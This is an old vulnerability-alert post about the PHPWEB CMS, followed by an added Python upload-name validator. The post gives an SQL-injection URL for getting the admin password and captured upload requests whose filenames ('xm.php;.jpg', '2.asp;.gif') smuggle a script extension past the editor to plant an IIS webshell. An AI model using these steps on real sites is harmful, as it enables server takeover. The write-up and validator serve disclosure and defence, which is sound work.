PHPWEB back end webshell: editor upload capture-and-resubmit (NC) vulnerability and fix - Vulnerability Alerts - 黑吧安全网

2011-10-09T00:00:00
ID MYHACK58:62201132032
Type myhack58
Reporter Anonymous
Modified 2011-10-09T00:00:00

Description

I had just finished watching TV and was too idle to sleep, so I picked a CMS to play with. PHPWEB is pretty bad: its back-end editor has such an elementary vulnerability. I had just seen someone say that the captured request is modified like this:

Only applicable to IIS... it does not work on Apache...

First, use the injection point to get the password:

down/class/index.php?myord=1

After that, the back-end address is admin.php

Log in and find a place where articles are published, such as

down/admin/down_conadd.php

Click the image button inside the detailed description below, then select a file to upload.

At this point, capture the request, or use a local proxy tool.

-----------------------------7db229330de4

Content-Disposition: form-data; name="fileName"

201108181313610483553.jpg

-----------------------------7db229330de4

Content-Disposition: form-data; name="attachPath"

down/pics/

-----------------------------7db229330de4

Content-Disposition: form-data; name="fileData"; filename="xm.jpg"

Content-Type: text/plain

You get the request above...

Modify it yourself: change filename="xm.jpg" to filename="xm.php;.jpg"

Send the packet and it is done...

I tried this, and it did not work.

Later I tried changing the generated file name so that it gets truncated, like the following:

-----------------------------7db29f214078c

Content-Disposition: form-data; name="fileName"

201109241316808273671.asp;.gif

-----------------------------7db29f214078c

Content-Disposition: form-data; name="attachPath"

news/pics/

-----------------------------7db29f214078c

Content-Disposition: form-data; name="fileData"; filename="2.asp;.gif"

Content-Type: text/plain

gb2312

<%

on error resume next

%>

This time it worked.

I wonder: don't editors like this all have the NC submission problem? I'll try the others.

from: zgg space
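
A server-side check for the client-controlled names seen in the captures above (the fileName form field and the filename= parameter), written as an added example that is not part of the original post or PHPWEB's own code. The extension lists and function names are assumptions, and the sample body is constructed from the second capture.

```python
import re
import secrets

# Assumed policy for this example: images only, never a server-side script type.
SCRIPT_EXTS = {"php", "asp", "aspx", "asa", "cer", "jsp"}
ALLOWED_EXTS = {"jpg", "jpeg", "gif", "png"}

# Constructed sample modelled on the second capture in the post.
SAMPLE = "\r\n".join([
    "-----------------------------7db29f214078c",
    'Content-Disposition: form-data; name="fileName"',
    "",
    "201109241316808273671.asp;.gif",
    "-----------------------------7db29f214078c",
    'Content-Disposition: form-data; name="attachPath"',
    "",
    "news/pics/",
    "-----------------------------7db29f214078c",
    'Content-Disposition: form-data; name="fileData"; filename="2.asp;.gif"',
    "Content-Type: text/plain",
    "",
    "(file bytes omitted)",
])

def extract_names(body):
    """Collect both client-controlled names: filename= and the fileName field."""
    names = re.findall(r'filename="([^"]*)"', body)
    names += re.findall(r'name="fileName"\r\n\r\n([^\r\n]*)', body)
    return names

def check_name(name):
    """Return the reasons a name is rejected; an empty list means acceptable."""
    reasons = []
    if re.search(r'[;:\x00/\\]', name):
        reasons.append("forbidden character")
    parts = [p.strip().lower() for p in re.split(r"[.;]", name)]
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        reasons.append("script extension present")
    if parts[-1] not in ALLOWED_EXTS:
        reasons.append("final extension not allowed")
    return reasons

def audit(body):
    """Map each rejected name in a multipart body to its reasons."""
    return {n: r for n in extract_names(body) if (r := check_name(n))}

def server_side_name(client_name):
    """Keep only a vetted extension; the stored stem is generated on the server."""
    if check_name(client_name):
        raise ValueError("rejected upload name: %r" % client_name)
    return secrets.token_hex(8) + "." + client_name.rsplit(".", 1)[-1].lower()
```
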